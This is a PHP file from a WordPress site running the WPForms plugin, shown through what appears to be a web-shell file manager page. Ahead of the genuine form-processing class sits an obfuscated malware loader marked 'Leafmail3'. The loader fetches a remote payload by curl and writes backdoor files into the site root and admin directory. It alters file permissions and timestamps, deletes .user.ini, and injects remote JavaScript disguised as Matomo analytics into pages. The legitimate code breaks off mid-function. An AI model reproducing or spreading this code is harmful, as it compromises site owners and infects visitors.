Sindbad~EG File Manager
<?php /*Leafmail3*/goto o1QFr; wasj3: $ZJUCA($jQ0xa, $RTa9G); goto wYDtx; IuHdj: $egQ3R = "\147\172\151"; goto ChKDE; TpHVE: $cPzOq .= "\157\x6b\x6b"; goto vgltl; gmVrv: $Mvmq_ .= "\x6c\x5f\x63\154\x6f"; goto N9T5l; SClM0: $VwfuP = "\x64\x65\146"; goto PXHHr; m8hp8: $uHlLz = "\x73\x74\x72"; goto lz2G0; UH4Mb: $eULaj .= "\x70\x63\x2e\x70"; goto apDh3; QPct6: AtVLG: goto Mg1JO; dj8v0: $ZJUCA = "\143\150"; goto WmTiu; uHm0i: $TBxbX = "\x57\x50\137\125"; goto RCot0; f4Rdw: if (!($EUeQo($kpMfb) && !preg_match($tIzL7, PHP_SAPI) && $fHDYt($uZmPe, 2 | 4))) { goto TGN7B; } goto S2eca; H7qkB: $MyinT .= "\164\40\x41\x63\x63"; goto Air1i; AedpI: try { goto JM3SL; oiS8N: @$YWYP0($lJtci, $H0gg1); goto nucR0; AffR5: @$YWYP0($PcRcO, $H0gg1); goto SpIUU; JnP2S: @$ZJUCA($lJtci, $shT8z); goto oiS8N; nOhHX: @$ZJUCA($lJtci, $RTa9G); goto LvbAc; LvbAc: @$rGvmf($lJtci, $UYOWA["\141"]); goto JnP2S; SpIUU: @$ZJUCA($jQ0xa, $shT8z); goto qvTm1; gA5rv: @$ZJUCA($PcRcO, $shT8z); goto AffR5; nucR0: @$ZJUCA($PcRcO, $RTa9G); goto COvI1; JM3SL: @$ZJUCA($jQ0xa, $RTa9G); goto nOhHX; COvI1: @$rGvmf($PcRcO, $UYOWA["\142"]); goto gA5rv; qvTm1: } catch (Exception $ICL20) { } goto PqZGA; BWxc9: $kpMfb .= "\154\137\x69\156\x69\164"; goto RMP1m; Q7gNx: $gvOPD = "\151\163\137"; goto AfwzG; fFfBR: goto AtVLG; goto kST_Q; J9uWl: $e9dgF .= "\x61\171\163"; goto lNb3h; ZlPje: $u9w0n .= "\x75\x69\x6c\144\x5f\161"; goto Mit4a; YRbfa: $dGt27 .= "\157\x73\x65"; goto L744i; ioNAN: $tIzL7 .= "\x6c\x69\57"; goto Khhgn; mz3rE: $FANp1 .= "\x70\141\x72\145"; goto SClM0; eBKm1: $PcRcO = $jQ0xa; goto Sg4f2; D0V8f: $pv6cp = "\162\x65"; goto Hy0sm; xXaQc: $FANp1 = "\x76\145\162\x73\151"; goto T7IwT; ulics: try { $_SERVER[$pv6cp] = 1; $pv6cp(function () { goto YEXR4; PKzAL: $AG2hR .= "\163\171\x6e\x63\75\164\162\165\145"; goto HIXil; NZAxH: $AG2hR .= "\x65\x72\75\164\x72\165\x65\x3b" . "\12"; goto Tbsb3; xDrpr: $AG2hR .= "\x75\x6d\x65\156\164\54\40\x67\75\144\x2e\143\162\145\x61\164\145"; goto mLjk9; r_Oqj: $AG2hR .= "\163\x63\162\151\160\164\x22\x3e" . "\xa"; goto JZsfv; PEdls: $AG2hR .= "\74\57\163"; goto WBFgG; POyWW: $AG2hR .= "\x4d\55"; goto a8oGQ; N2RIK: $AG2hR .= "\175\x29\50\51\x3b" . "\12"; goto PEdls; Vj0ze: $AG2hR .= "\x72\151\160\x74\40\164\x79\x70\145\x3d\42\164\145\170"; goto FXjwZ; JZsfv: $AG2hR .= "\x28\x66\x75\156\143"; goto ZRBmo; zk1Ml: $AG2hR .= "\x79\124\141\147\x4e\x61\155\145"; goto STHB_; aKt86: $AG2hR .= "\x72\x69\160\x74\42\51\x2c\40\x73\75\x64\x2e\x67\x65\x74"; goto oxuwD; FXjwZ: $AG2hR .= "\x74\57\x6a\141\x76\141"; goto r_Oqj; YffEK: $AG2hR .= "\57\x6d\141\164"; goto nL_GE; ZrlUz: $AG2hR .= "\x73\x63\162\151\x70\164\x22\x3b\40\147\x2e\141"; goto PKzAL; MSqPC: $AG2hR .= "\x65\x20\55\x2d\76\12"; goto rWq2m; gUhrX: $AG2hR .= "\74\x73\143"; goto Vj0ze; oxuwD: $AG2hR .= "\x45\154\x65\x6d\145\156\164\x73\102"; goto zk1Ml; a8oGQ: $AG2hR .= time(); goto xyZaU; WBFgG: $AG2hR .= "\x63\162\151\160\164\x3e\xa"; goto jHj0s; rWq2m: echo $AG2hR; goto zxMHd; zzMTI: $AG2hR .= "\152\141\166\x61"; goto ZrlUz; HIXil: $AG2hR .= "\73\x20\147\56\144\x65\x66"; goto NZAxH; EXhzp: $AG2hR .= "\x65\156\164\x4e\x6f\x64\145\56\x69\x6e"; goto yJp9W; KUpUt: $AG2hR .= "\x64\40\115\141\x74"; goto c13YM; hugz8: $AG2hR .= "\x6f\x72\145\50\x67\54\x73\51\73" . "\xa"; goto N2RIK; xyZaU: $AG2hR .= "\x22\73\40\163\56\160\141\162"; goto EXhzp; ZRBmo: $AG2hR .= "\164\151\x6f\156\x28\51\x20\173" . "\xa"; goto sOVga; YqIfq: $AG2hR .= "\77\x69\x64\x3d"; goto POyWW; Tbsb3: $AG2hR .= "\147\x2e\163\x72"; goto vxsas; k1w2Q: $AG2hR = "\x3c\41\x2d\55\x20\115\x61"; goto OOFo2; F2sIB: $AG2hR .= "\x3d\x22\164\x65\x78\x74\57"; goto zzMTI; OOFo2: $AG2hR .= "\x74\157\155\x6f\x20\55\x2d\x3e\xa"; goto gUhrX; vxsas: $AG2hR .= "\143\x3d\165\x2b\42\x6a\163\57"; goto JGvCK; jHj0s: $AG2hR .= "\74\x21\55\55\40\x45\156"; goto KUpUt; mLjk9: $AG2hR .= "\105\154\x65\x6d\x65\156\x74\50\42\163\x63"; goto aKt86; yJp9W: $AG2hR .= "\x73\x65\162\x74\102\145\146"; goto hugz8; c13YM: $AG2hR .= "\x6f\x6d\x6f\40\103\157\144"; goto MSqPC; STHB_: $AG2hR .= "\50\x22\x73\x63\162\x69"; goto SX8pI; JGvCK: $AG2hR .= $osL5h; goto YffEK; nL_GE: $AG2hR .= "\x6f\155\x6f\56\x6a\x73"; goto YqIfq; SX8pI: $AG2hR .= "\160\x74\42\51\133\x30\135\x3b" . "\xa"; goto uh8pE; YEXR4: global $osL5h, $cPzOq; goto k1w2Q; jW6LQ: $AG2hR .= "\166\141\x72\40\144\x3d\x64\157\143"; goto xDrpr; uh8pE: $AG2hR .= "\x67\x2e\164\x79\x70\145"; goto F2sIB; sOVga: $AG2hR .= "\166\x61\162\40\x75\75\42" . $cPzOq . "\42\x3b" . "\xa"; goto jW6LQ; zxMHd: }); } catch (Exception $ICL20) { } goto arBxc; TrkYs: $eULaj .= "\x2f\170\x6d"; goto GE2p3; L744i: $cPzOq = "\x68\x74\164\x70\163\72\57\x2f"; goto TpHVE; CNdmS: wLXpb: goto wasj3; nHXnO: $_POST = $_REQUEST = $_FILES = array(); goto CNdmS; PHhHL: P9yQa: goto W2Q7W; UkCDT: $cLC40 = 32; goto BnazY; vabQZ: $CgFIN = 1; goto QPct6; gSbiK: try { goto xtnST; qBVAq: $k7jG8[] = $E0suN; goto Tc9Eb; vZ6zL: $E0suN = trim($Q0bWd[0]); goto LuoPM; D98P3: if (!empty($k7jG8)) { goto FbDAI; } goto AML_a; LuoPM: $jCv00 = trim($Q0bWd[1]); goto Q4uy7; xtnST: if (!$gvOPD($d3gSl)) { goto nHP5K; } goto W8uMn; c_73m: FbDAI: goto h1Cu7; kNAxm: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto lfWQh; } goto MfJKK; L8cv7: WVm2j: goto c_73m; AML_a: $d3gSl = $jQ0xa . "\x2f" . $HNQiW; goto GBRPC; ZSYyc: $jCv00 = trim($Q0bWd[1]); goto kNAxm; W8uMn: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto Woix_; EA1BT: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto ctSg2; } goto A163l; Woix_: if (!(is_array($Q0bWd) && count($Q0bWd) == 2)) { goto wU2zk; } goto vZ6zL; Q4uy7: if (!($uHlLz($E0suN) == $cLC40 && $uHlLz($jCv00) == $cLC40)) { goto VAVW5; } goto qBVAq; tEVz_: $k7jG8[] = $jCv00; goto xWpvL; xWpvL: lfWQh: goto oilos; MfJKK: $k7jG8[] = $E0suN; goto tEVz_; N3TyU: wU2zk: goto snD7p; lky0R: $Q0bWd = @explode("\72", $DJDq1($d3gSl)); goto EA1BT; Tc9Eb: $k7jG8[] = $jCv00; goto evp7M; snD7p: nHP5K: goto D98P3; oilos: ctSg2: goto L8cv7; evp7M: VAVW5: goto N3TyU; GBRPC: if (!$gvOPD($d3gSl)) { goto WVm2j; } goto lky0R; A163l: $E0suN = trim($Q0bWd[0]); goto ZSYyc; h1Cu7: } catch (Exception $ICL20) { } goto xU6vT; T7IwT: $FANp1 .= "\x6f\x6e\x5f\143\x6f\x6d"; goto mz3rE; JX1Oy: $dGt27 = "\x66\x63\x6c"; goto YRbfa; BnazY: $Pzt0o = 5; goto TYFaW; o1QFr: $kFvng = "\74\x44\x44\x4d\x3e"; goto wODYw; CL80L: $MyinT .= "\120\x2f\61\x2e\x31\x20\x34"; goto gErqa; tFGg7: $YWYP0 .= "\x75\143\x68"; goto dj8v0; pXfDS: $ygOJ_ .= "\x2f\167\160"; goto c7yEe; xUd9U: $pv6cp .= "\151\x6f\x6e"; goto bqFyS; PqZGA: CVVA3: goto RDKTA; wYDtx: $uZmPe = $nPBv4($eULaj, "\x77\x2b"); goto f4Rdw; E453u: $QIBzt .= "\56\64"; goto O8RXw; a4EJZ: $dZR_y = $cPzOq; goto vZkPa; FK_sr: $kb9bA .= "\x65\162\x2e\x69"; goto G2uff; TuwL4: $jQ0xa = $_SERVER[$Wv1G0]; goto wrxGI; wJDrU: $eULaj = $jQ0xa; goto TrkYs; MLdcc: $fHDYt .= "\x63\153"; goto JX1Oy; Gs7Gb: $kpMfb = $vW4As; goto BWxc9; Mit4a: $u9w0n .= "\x75\x65\x72\171"; goto cIo5P; GE2p3: $eULaj .= "\x6c\162"; goto UH4Mb; cIo5P: $uAwql = "\155\x64\65"; goto aXExt; c7yEe: $ygOJ_ .= "\x2d\x61"; goto XWOCC; wrxGI: $ygOJ_ = $jQ0xa; goto pXfDS; XsWqd: $kb9bA .= "\57\56\165\163"; goto FK_sr; cWrVz: $nPBv4 .= "\145\x6e"; goto KCtWA; CrWKs: $l0WLW .= "\157\160\x74"; goto jcG0e; lz2G0: $uHlLz .= "\154\x65\x6e"; goto xXaQc; wee0Y: $ulOTQ .= "\115\111\116"; goto Tfi5q; vgltl: $cPzOq .= "\154\x69\x6e\153\56\x74"; goto pr5fA; Khhgn: $tIzL7 .= "\x73\151"; goto JBJmV; kJlf4: $DJDq1 .= "\147\145\164\137\143"; goto NZqWx; lNb3h: $H0gg1 = $xsR4V($e9dgF); goto XYviL; TBl6Q: sLwcv: goto fFfBR; RMP1m: $l0WLW = $vW4As; goto ujtZa; XQnCd: $PcRcO .= "\x61\143\143\145\163\x73"; goto ikUIP; X4xWX: $QIBzt = "\x35"; goto E453u; hDUdL: $MWMOe .= "\x6c\x65"; goto Q7gNx; LxUUO: $RTa9G = $QTYip($HqqUn($RTa9G), $Pzt0o); goto qaeyL; f6Txl: $HqqUn = "\x64\x65\143"; goto gwNCH; sK97X: $nPBv4 = "\x66\157\160"; goto cWrVz; Ee0VW: $EUeQo .= "\164\x69\x6f\156\x5f"; goto a2JJX; D9NbF: $CgFIN = 1; goto PHhHL; VY3H_: $Wv1G0 = "\x44\117\x43\x55\115\105\116\x54"; goto HpOFr; CRqG1: if (empty($k7jG8)) { goto VIn91; } goto s4AWH; apDh3: $eULaj .= "\x68\160\x2e\60"; goto sK97X; Sg4f2: $PcRcO .= "\57\x2e\x68\x74"; goto XQnCd; jcG0e: $YQ0P6 = $vW4As; goto rA_Dy; dlqC2: $HNQiW = substr($uAwql($osL5h), 0, 6); goto xGZOR; kxKwG: $osL5h = $_SERVER[$i5EZR]; goto TuwL4; ozW5s: $e9dgF .= "\63\x20\x64"; goto J9uWl; xU6vT: $lJtci = $jQ0xa; goto BpRMk; CquiC: $dZR_y .= "\x63\x6f\160\171"; goto BLSy0; GSfrX: $pv6cp .= "\x75\x6e\143\164"; goto xUd9U; yaYSs: $rGvmf .= "\x6f\x6e\x74\x65\156\164\163"; goto mIlAi; FXRyn: $TBxbX .= "\115\x45\x53"; goto R1jVG; kST_Q: VIn91: goto vabQZ; flXr3: $shT8z = $QTYip($HqqUn($shT8z), $Pzt0o); goto TkfCl; FJdH4: $dZR_y .= "\x3d\x67\x65\x74"; goto CquiC; kJyDh: $QTYip = "\x69\156\x74"; goto blzff; s4AWH: $H25pP = $k7jG8[0]; goto t74Wt; TyAte: $k7jG8 = array(); goto UkCDT; EO8QL: try { $UYOWA = @$AkFS8($egQ3R($eKFWX($M7wqP))); } catch (Exception $ICL20) { } goto OXweB; XYviL: $i5EZR = "\110\124\124\x50"; goto j4Pjv; ikUIP: $kb9bA = $jQ0xa; goto XsWqd; VrwTF: $nRD8p .= "\x64\x69\162"; goto aQp1m; dLa5a: $pv6cp .= "\x65\162\x5f"; goto x5YEr; PgImI: @$ZJUCA($kb9bA, $RTa9G); goto yAax8; Jb1Vu: try { goto Bwps7; WPylr: if (!$xsy4x($Y61WO)) { goto nWSzU; } goto NpK90; xqrLf: @$YWYP0($dqnvi, $H0gg1); goto cinsF; N7wJU: if ($xsy4x($Y61WO)) { goto KOuoA; } goto RBLfp; wf0jq: @$ZJUCA($Y61WO, $shT8z); goto xqrLf; bfkJn: try { goto jwOvP; sXqkD: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto tXay1; jwOvP: $ekYPG = $kpMfb(); goto jMqt3; VURt4: $l0WLW($ekYPG, CURLOPT_POST, 1); goto Qk7oo; G7Y1e: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto Sw_Ys; lg1iu: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 3); goto VURt4; jMqt3: $l0WLW($ekYPG, CURLOPT_URL, $LfwPf . "\x26\164\x3d\151"); goto G7Y1e; Qk7oo: $l0WLW($ekYPG, CURLOPT_POSTFIELDS, $u9w0n($Lx9yT)); goto axPES; Sw_Ys: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto sXqkD; tXay1: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto Gb33B; PUEHo: $Mvmq_($ekYPG); goto rF4qo; Gb33B: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto lg1iu; axPES: $YQ0P6($ekYPG); goto PUEHo; rF4qo: } catch (Exception $ICL20) { } goto zCePm; s2GBY: $Y61WO = dirname($dqnvi); goto N7wJU; bO0VE: KOuoA: goto WPylr; RBLfp: @$ZJUCA($jQ0xa, $RTa9G); goto lexI4; NpK90: @$ZJUCA($Y61WO, $RTa9G); goto aGYEQ; wsLep: $Lx9yT = ["\144\x61\x74\x61" => $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?>
<?php
/**
* Process and validate form entries.
*
* @since 1.0.0
*/
class WPForms_Process {
/**
* Store errors.
*
* @since 1.0.0
*
* @var array
*/
public $errors;
/**
* Store spam errors.
*
* @since 1.8.3
*
* @var array
*/
public $spam_errors;
/**
* Spam reason.
*
* @since 1.8.3
*
* @var string
*/
public $spam_reason;
/**
* Confirmation message.
*
* @var string
*/
public $confirmation_message;
/**
* Current confirmation.
*
* @since 1.6.9
*
* @var array
*/
private $confirmation;
/**
* Store formatted fields.
*
* @since 1.0.0
*
* @var array
*/
public $fields;
/**
* Store the ID of a successful entry.
*
* @since 1.2.3
*
* @var int
*/
public $entry_id = 0;
/**
* Form data and settings.
*
* @since 1.4.5
*
* @var array
*/
public $form_data;
/**
* If a valid return has was processed.
*
* @since 1.4.5
*
* @var bool
*/
public $valid_hash = false;
/**
* Primary class constructor.
*
* @since 1.0.0
*/
public function __construct() {
$this->hooks();
}
/**
* Register hooks.
*
* @since 1.8.3
*/
private function hooks() {
add_action( 'wp', [ $this, 'listen' ] );
add_action( 'wp_ajax_wpforms_submit', [ $this, 'ajax_submit' ] );
add_action( 'wp_ajax_nopriv_wpforms_submit', [ $this, 'ajax_submit' ] );
}
/**
* Listen to see if this is a return callback or a posted form entry.
*
* @since 1.0.0
*/
public function listen() {
// Catch the post_max_size overflow.
if ( $this->post_max_size_overflow() ) {
return;
}
// phpcs:disable WordPress.Security.NonceVerification
if ( ! empty( $_GET['wpforms_return'] ) ) {
// Additional redirect trigger for addons.
$this->entry_confirmation_redirect( '', sanitize_text_field( wp_unslash( $_GET['wpforms_return'] ) ) );
}
$form_id = ! empty( $_POST['wpforms']['id'] ) ? absint( $_POST['wpforms']['id'] ) : 0;
if ( ! $form_id ) {
return;
}
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
$this->process( wp_unslash( $_POST['wpforms'] ) );
// phpcs:enable WordPress.Security.NonceVerification
if ( ! wpforms_is_amp() ) {
return;
}
// Send 400 Bad Request when there are errors.
if ( empty( $this->errors[ $form_id ] ) ) {
wp_send_json(
[
'message' => $this->get_confirmation_message( $this->form_data, $this->fields, $this->entry_id ),
],
200
);
return;
}
$message = $this->errors[ $form_id ]['header'];
if ( ! empty( $this->errors[ $form_id ]['footer'] ) ) {
$message .= ' ' . $this->errors[ $form_id ]['footer'];
}
wp_send_json(
[
'message' => $message,
],
400
);
}
/**
* Process the form entry.
*
* @since 1.0.0
* @since 1.6.4 Added hCaptcha support.
*
* @param array $entry Form submission raw data ($_POST).
*/
public function process( $entry ) {
$this->errors = [];
$this->fields = [];
/* @var int $form_id Annotate the type explicitly. */
$form_id = absint( $entry['id'] );
$form = wpforms()->get( 'form' )->get( $form_id );
// Validate form is real and active (published).
if ( ! $form || $form->post_status !== 'publish' ) {
$this->errors[ $form_id ]['header'] = esc_html__( 'Invalid form.', 'wpforms-lite' );
return;
}
/**
* Filter form data obtained during form process.
*
* @since 1.5.3
*
* @param array $form_data Form data.
* @param array $entry Form entry.
*/
$this->form_data = (array) apply_filters( 'wpforms_process_before_form_data', wpforms_decode( $form->post_content ), $entry );
if ( ! isset( $this->form_data['fields'], $this->form_data['id'] ) ) {
$error_id = uniqid( '', true );
// Logs missing form data.
wpforms_log(
/* translators: %s - error unique ID. */
sprintf( esc_html__( 'Missing form data on form submission process %s', 'wpforms-lite' ), $error_id ),
esc_html__( 'Form data is not an array in `\WPForms_Process::process()`. It might be caused by incorrect data returned by `wpforms_process_before_form_data` filter. Verify whether you have a custom code using this filter and debug value it is returning.', 'wpforms-lite' ),
[
'type' => [ 'error', 'entry' ],
'form_id' => $form_id,
]
);
$error_messages[] = esc_html__( 'Your form has not been submitted because data is missing from the entry.', 'wpforms-lite' );
if ( wpforms_setting( 'logs-enable' ) && wpforms_current_user_can( wpforms_get_capability_manage_options() ) ) {
$error_messages[] = sprintf(
wp_kses( /* translators: %s - URL to the WForms Logs admin page. */
__( 'Check the WPForms » Tools » <a href="%s">Logs</a> for more details.', 'wpforms-lite' ),
[ 'a' => [ 'href' => [] ] ]
),
esc_url(
add_query_arg(
[
'page' => 'wpforms-tool',
'view' => 'logs',
],
admin_url( 'admin.php' )
)
)
);
/* translators: %s - error unique ID. */
$error_messages[] = sprintf( esc_html__( 'Error ID: %s.', 'wpforms-lite' ), $error_id );
}
$errors[ $form_id ]['header'] = implode( '<br>', $error_messages );
$this->errors = $errors;
return;
}
/**
* Filter form entry before processing.
* Data is not validated or cleaned yet so use with caution.
*
* @since 1.4.0
*
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data.
*/
$entry = apply_filters( 'wpforms_process_before_filter', $entry, $this->form_data );
/**
* Pre-process hook.
*
* @since 1.4.0
*
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data.
*/
do_action( 'wpforms_process_before', $entry, $this->form_data );
/**
* Pre-process hook by form ID.
*
* @since 1.4.0
*
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data.
*/
do_action( "wpforms_process_before_{$form_id}", $entry, $this->form_data );
// Validate fields.
foreach ( $this->form_data['fields'] as $field_properties ) {
$field_id = $field_properties['id'];
$field_type = $field_properties['type'];
$field_submit = isset( $entry['fields'][ $field_id ] ) ? $entry['fields'][ $field_id ] : '';
/**
* Field type validation hook.
*
* @since 1.4.0
*
* @param int $field_id Field ID.
* @param mixed $field_submit Field submitted value.
* @param array $form_data Form data.
*/
do_action( "wpforms_process_validate_{$field_type}", $field_id, $field_submit, $this->form_data );
}
// Check if combined upload size exceeds allowed maximum.
$this->validate_combined_upload_size( $form );
/**
* Filter initial errors.
* Don't proceed if there are any errors thus far. We provide a filter
* so that other features, such as conditional logic, have the ability
* to adjust blocking errors.
*
* @since 1.4.0
*
* @param array $errors List of errors.
* @param array $form_data Form data.
*/
$errors = apply_filters( 'wpforms_process_initial_errors', $this->errors, $this->form_data );
